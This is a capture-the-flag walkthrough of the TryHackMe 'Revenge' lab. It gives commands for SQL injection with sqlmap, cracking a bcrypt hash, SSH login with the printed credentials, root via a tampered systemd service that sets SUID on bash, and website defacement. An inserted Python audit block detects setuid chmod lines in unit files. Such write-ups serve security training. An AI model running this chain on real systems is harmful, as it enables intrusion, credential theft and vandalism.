Revenge — TryHackMe — WriteUp

Nov 25, 2020


Hello. I’m Rahmos. Here is my Revenge — TryHackMe — WriteUp. Check it out!

First, let’s download Billy’s message.


Well, looks like he wants me to deface the website! Next up, deploy the machine and run nmap to find open ports.

nmap -A -T4 -p- -v <ip>


There are 2 open ports: 22 (SSH) and 80 (HTTP). First, let’s access the website.


I’ve checked the page source (Ctrl + U), but found nothing valuable. Next, find hidden dirs and files using gobuster:

gobuster dir -u http://<ip>:80/ -w /path-to-wordlist


Let’s access /login:


and /admin:


Ok, so there are 2 login pages: one for customers and one for admins. But I haven’t got any credentials yet.

Look at the description:

Ok so I’ll use sqlmap to look for SQLi on this website:

sqlmap -u http://<ip>:80/products/1 --batch --current-db

Why /products/1? Because that is where the website loads the products from the database and displays them on the page.


After a while, I’ve got the database name: “duckyinc”. Follow the database name to look for tables inside it:

sqlmap -u http://<ip>/products/1 --batch -D duckyinc --tables


And yes, I’ve found 3 tables inside the “duckyinc” database. Let’s dump everything from those 3 tables:

sqlmap -u http://<ip>/products/1 --batch -D duckyinc --dump

Focus on the “user” table and you will see your 1st flag:

Now for the “system_user” table:


I’ve found the credentials of server-admin. Let’s crack that password hash using john. It’s a bcrypt hash. I will copy the password hash to a text file called “server_admin.txt”.

john --wordlist=rockyou.txt server_admin.txt


The password has been cracked! Let’s log in at /admin using the credentials:
server-admin : inuyasha

However, I cannot log in! So what’s this password for? Let’s try SSH:

ssh server-admin@<ip>

Enter the password:


And that’s it! Now I’m into the machine. Find the flag:


Now I’ll find a way to own root to get the 3rd flag. First, sudo -l to see if server-admin can run sudo:

Because server-admin can edit the duckyinc.service, I will modify this service to get root:

sudoedit /etc/systemd/system/duckyinc.service

This is the original duckyinc.service


This is the modified duckyinc.service.


The modified service sets the SUID bit on /bin/bash. Save the file and then:

sudo systemctl daemon-reload

sudo systemctl restart duckyinc.service


/bin/bash -p
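Seen from the defender's side, the unit-file change and the resulting SUID shell described above are both easy to audit for. The following is an added example, not part of the original write-up: the sample unit content is constructed (the room's actual file is not reproduced here), the function names are hypothetical, and the chmod pattern is a heuristic.

```python
import os
import re
import stat

# Heuristic: chmod adding setuid/setgid, symbolic (+s, u+s) or octal (4755, 6755).
SETID_CHMOD = re.compile(
    r"\bchmod\s+(?:-\S+\s+)*(?:[ugoa]*[+=][rwxXst]*s|0?[2-7][0-7]{3}\b)")

# Constructed sample of a tampered unit (not the room's actual file).
SAMPLE_UNIT = """\
[Service]
User=www-data
ExecStart=/usr/bin/example-app
ExecStartPre=+/bin/chmod 4755 /bin/bash
"""

def audit_unit(text):
    """Return Exec* lines that set setuid/setgid while running privileged."""
    user, execs, section = "root", [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line and line[0] not in "#;":
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "User":
                user = value or "root"  # system units run as root by default
            elif key.startswith("Exec"):
                execs.append((key, value))
    findings = []
    for key, value in execs:
        prefix = value[:len(value) - len(value.lstrip("@-:+!"))]
        # A "+" prefix runs the command with full privileges despite User=.
        if (user in ("root", "0") or "+" in prefix) and SETID_CHMOD.search(value):
            findings.append(f"{key}={value}")
    return findings

def setid_files(paths):
    """Return the existing regular files in `paths` that carry setuid/setgid."""
    bits = stat.S_ISUID | stat.S_ISGID
    return [p for p in paths if os.path.isfile(p) and os.stat(p).st_mode & bits]

if __name__ == "__main__":
    print("unit findings:", audit_unit(SAMPLE_UNIT))
    print("setuid shells:", setid_files(["/bin/sh", "/bin/bash", "/bin/dash"]))
```

Running the unit check over every file in /etc/systemd/system after any sudoedit session, and alerting when a shell appears in the setuid list, covers both halves of the change.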


Now I’m root! Let’s cd to /root and see what’s inside:


Well, there’s no flag here. So I need to deface the website to get the final flag.


cd /var/www/duckyinc/templates

Then edit the “index.html”:


After that, cd to /root and you will see flag3:


The end.